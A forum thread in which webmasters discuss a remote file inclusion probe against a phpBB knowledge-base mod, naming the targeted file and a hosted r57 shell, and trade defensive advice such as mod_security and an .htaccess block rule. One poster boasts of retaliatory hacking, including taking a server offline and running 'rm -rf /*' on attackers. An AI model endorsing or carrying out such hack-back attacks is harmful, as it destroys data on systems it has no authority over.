So, I'm looking at the "Who's Online" for one of the vBulletin forums I frequent and see where someone with a Norwegian IP address is trying to access: I added spaces to the domain to revent the URL from being read by search engines. I Googled kb_constants.php and see that it is a a phpbb knowledge base mod (with a known security vulnerability). The forum happens to be the Project Management Knowledge Base. I think it's easy to see why their bot targeted the site. So, I check out the e t r i p l e.com site and see it is some sort of wireless service site. Checking the whois info, I see they are based in the USA. I checked out the r57.txt file that is on their server and it's a php source code for some Russian hacker. I wonder if the e t r i p l e.com folks even know it's there. The file is placed inside a directory for their Xcart script. Should I pursue getting the Norwegian IP on a blacklist? Should I contact the e t r i p l e.com site owner? What would you suggest/do?
if you look at the text file, it's more then likey a script of sometype that is ment to run on your server and give them the information they'd need about your site. Before you go and block it, go and see if you can update the software first (ie they have fixed the hole). if not, try and block it with your .htaccess file something like RewriteRule ^includes/kb_constants.php?module_root_path=(*.).txt$ [F,L] (not sure if that rule will work - wrote it outta my head without testing it)
I don't think you understood. The site being hit by the exploit attempt is running vBulletin. The exploit is for a phpBB mod (add-on). The site is in no danger. It is not using the mod that is being targeted. I believe the site is being targeted only because it has the words knowledge base in the title (which is the name of the phpbb mod that they are trying to exploit). Also, I don't think blocking the IP will would matter. A few days ago, I saw 3 more attempts at this exploit from 3 new IPs and using 2 different exploit scripts (ie. not e t r i p l e.com). I believe the hackers are using compromised machines to send the exploit attempts.
I get some requests for a lot of strange files on many of my sites. I dont care about it really, it does no harm.
I second BTS - mod_security is almost a must these days - an be prepared to see a lot more inbound hack attempts than you thought! You'll also get to see a lot of stupid attempts complete with misspeeellings and all - and yes, mention the word CMS in a web page and prepare for the onslaught of the stupid.
Well people try and hack me all the time, I invite it and love it actually.. I simply hack them back.. I have a serious if you play with me I'll play with you policy.. Had this one AIX server at some college scan me, I dropped that AIX box off the internet in about 5 minutes. I SIMPLY love it when people try and hack me. I know that isn't traditional but who cares, if they have the balls to scan me so hard my IDS blows up well I have the balls to drop their server off the internet and maybe rm -rf /* but I only do that when drunk like now
It sounds like they are using an automated exploit-finding script. It probably just searches for tripwords associated with vulnerable systems (eg. Knowledge Base, as you said) and attempts to exploit them, for whatever reason. This is all I can think of. A human hacker would likely realize that they're in the wrong place.
No point in wasting your time running around trying to get them blacklisted, just block the ip on your firewall. Alot of hackers will use proxy servers anyway when making an attack on your site so trying to track them down or report them is just fruitless.
What often happens is a cracker gains access to upload a file to a remote web server they are not able to exicute the file on that server so they name it .txt and have an exploit in it At that point they use that server to exploit other sites. Quite often through cross site scripting (XSS). On top of that most of the time the IP address that is in your logs is a proxy. This means there is not much you can do besides block the address. I have found that if you contact the person in charge of the web server they are often grateful. I've done that quite a few times and helped them resolve the issue with their server.
chickens, that is exactly what I suspected was happening in the case I observed. I never did follow up with etriple.com though.
Bernard: Yeah, I go through my mod_security logs about once a week and check to see if the files still exist on the remote server. If they do then I contact the web site admin with a quick email.